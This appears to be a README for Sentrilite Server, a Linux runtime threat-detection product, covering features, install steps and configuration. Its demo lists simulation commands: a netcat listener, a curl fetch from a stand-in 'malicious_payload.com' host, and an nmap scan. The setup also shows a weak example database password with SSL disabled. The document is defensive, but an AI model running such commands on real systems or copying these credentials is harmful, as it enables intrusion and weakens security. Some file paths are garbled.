Website: https://sentrilite.com
Contact: info@sentrilite.com
- Detection of active threats during execution
- Risk scoring based on syscall + process + network behavior
- Automatic process termination for high-risk activity
This demo shows real-time detection and automatic termination of malicious activity on a live Linux system using Sentrilite.
| Color | Category | Meaning |
|---|---|---|
| 🔴 Red | Critical Risk | Confirmed malicious behavior with high confidence |
| 🟠 Orange | Medium Risk | Suspicious activity requiring investigation |
| 🟣 Purple | Active Response | Enforcement action taken – process terminated |
The following commands were used for simulation:
sudo nc -l 5000
curl http://malicious_payload.com >/dev/null 2>&1
nmap -p 22,80,443 127.0.0.1 >/dev/null 2>&1
Sentrilite Server is the main control plane for Sentrilite agents. It ingests real-time telemetry from endpoints, servers and Kubernetes nodes, correlates alerts, and exposes everything through a single web dashboard and API.
-
Centralized Control Plane Manage and monitor all Sentrilite agents from a single server across cloud, on-prem, and Kubernetes environments.
-
Manage Alerts All alerts are encrypted using tls/ssl keys and saved to a centralized postgres db.
-
Real-Time Telemetry Ingestion High-throughput ingestion of structured process, file, and network events streamed from agents in real time.
-
Unified Web Dashboard Web UI for live event streaming, alert triage, node health, rule management, and reporting.
-
Detection-as-Code & Response (DACR) Define and manage detection rules centrally using JSON. Rules are applied instantly across all connected agents — no restarts or redeploys.
-
Risk Scoring & Alerting Events are tagged, scored, and escalated into alerts with clear context for fast triage and response.
-
AI / Heuristic Insights (Optional) Generate per-node security insights using LLMs or built-in heuristics to summarize alerts and highlight suspicious behavior.
-
Audit & Reporting Export audit-ready reports (PDF / JSON / CSV) with timelines, risky activity, and per-node summaries.
-
Kubernetes-Aware Understands nodes, pods, containers, and namespaces when agents run as DaemonSets, presenting normalized data in the UI.
-
Integrations Forward alerts to existing tooling such as Prometheus Alertmanager, PagerDuty, Slack, or external SIEMs.
-
Scalable & Lightweight Designed to handle high event volumes with minimal operational overhead.
| File | Purpose |
|---|---|
install_db.sh |
Script to load the ebpf kernel module |
sentrilite-serverctl.sh |
Script to start/stop sentrilite-server |
sentrilite-server |
Go control-plane server that accepts alerts from agents and hosts the admin dashboard |
ui/sentrilite.html |
Main frontend UI for viewing node status/alerts/reports etc. |
ss.conf |
Configuration file for Sentrilite Server |
server.cnf |
Configuration file for generating keys. |
license.key |
Sentrilite License key file |
LICENSE.txt |
Sentrilite License Agreement |
gen_keys.txt |
Instructions to create tls/ssl/jwt keys for authentication/authorization |
README.md |
This document |
- Ports: 8080 (dashboard), 9765 (WebSocket for agents)
- postgres db: Saves alerts to postgres db which is created by the installation script.
The project is currently using a trial license.key .
- SIEMS: Can seamlessly integrate with third party SIEM tools.
- Can push alerts to Pagerduty/Prometheus-Alert-Manager.
- Unzip the bundle:
unzip sentrilite_se/install.shrver_bundle.zip
cd sentrilite-server
- Start Postgres Server and create sentrilite database
sudo -u sentrilite psql -d sentrilite
CREATE USER sentrilite WITH PASSWORD 'prod';
CREATE DATABASE sentrilite OWNER sentrilite;
sudo ./install_db.sh
- Generate the ssl/tls keys:
Refer gen_keys.txt. They keys generated should be: ca certs, server certs and agent certs and jwt keys (for agent authentication)
- Open ss.conf and configure:
LICENSE_FILE_PATH=./license.key
LISTEN_ADDR=:9765
# TLS / mTLS
TLS_CERT=ss.crt
TLS_KEY=ss.key
TLS_CA=ca.crt
# JWT
JWT_PRIVATE_KEY=jwt_private.pem
JWT_PUBLIC_KEY=jwt_public.pem
DATABASE_URL=postgres://sentrilite:prod@localhost:5432/sentrilite?sslmode=disable
ADMIN_USERNAME=
ADMIN_PASSWORD=
# LLM integration
LLM_ENABLED=false
LLM_URL=
# AI insights refresh interval
AI_INSIGHTS_INTERVAL_MINUTES=1
# Max alerts considered per node
AI_INSIGHTS_MAX_ALERTS=50
- Launch the Server:
sudo ./sentrilite-serverctl.sh start
- Open the Dashboard: Open in your browser: http://:8080/sentrilite.html
Click choose node file and select a file containing your server lists. Example file format:
Server_1_ip_address,prod
Server_2_ip_address,test
Once uploaded correctly, Sentrilite agent will monitor and show status/alerts/AI insights for these servers.
For more detail information, refer to dashboard.README
- license.key — place in the current directory (baked in image or mounted as Secret).
- ss.conf — configuration file
sudo ./sentrilite-serverctl.sh stop
For licensing, troubleshooting, or feature requests: